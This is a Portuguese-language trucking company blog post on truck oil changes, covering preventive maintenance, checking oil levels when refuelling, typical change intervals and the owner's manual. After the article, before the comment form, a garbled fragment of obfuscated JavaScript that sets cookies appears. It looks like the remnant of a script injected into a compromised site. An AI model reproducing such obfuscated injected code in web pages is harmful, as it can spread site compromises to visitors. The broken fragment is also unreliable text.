Artigos grupo rota, Caminhões e Carretas

Como funciona a troca de óleo para caminhão?

Você sabia que a troca de óleo para caminhão faz parte da manutenção preventiva do seu veículo?

Já ouviu o ditado ‘prevenir é melhor que remediar’? Muitos afirmam que o ditado popular faz parte de muitas escolhas do nosso dia-a-dia. O ato de prevenir está presente na saúde, na segurança pública e do trabalho e na manutenção de veículos de médios e grandes portes. Como funciona a troca de óleo para caminhão?

Para veículos de grande porte, que costumam fazer rotas longas, é fundamental que o carro apresente condições seguras de concluir o trajeto sem passar por situações adversas. No caso dos caminhões, a manutenção preventiva é fundamental para aumentar a segurança do motorista e dos veículos que transitam na pista e também para a economia dos possíveis gastos com o veículo se a manutenção não for realizada no tempo certo.

Qual é o prazo ideal para a troca de óleo no caminhão?

Segundo mecânicos especializados, o ideal é estar sempre verificando o nível do óleo do motor sempre que abastecer. O procedimento é realizado com o veículo estacionado, em um lugar plano, para que não ocorra eventuais falhas de leitura do líquido.

Para cada modelo, a troca de óleo ocorre de forma diferente. Em condições de rodagem ideal, a troca é recomendada entre 10 e 15 mil km rodados, o que equivale há um ano de uso interrupto do veículo. Dependendo do uso do caminhão, principalmente em situações adversas, em que o veículo é submetido à altas temperaturas.

Como funciona a troca de óleo para caminhão?

O ideal é que o motorista verifique junto ao seu ‘Manual do Proprietário’ as especificações e recomendações para o seu tipo de veículo. Com a manutenção preventiva, garante-se a preservação de portes móveis do veículo, assim como bielas, cilindros, anéis e válvulas. Por isso, é fundamental que o motorista se mantenha atento e siga as instruções para uma manutenção preventiva de sucesso!

Para mais informações e novidades, acesse nosso blog e redes sociais!

,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var (e||”)+g+’;\x20path=/’;}r (0x0)==’\x20′)n=n[b(‘0xb’)]

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *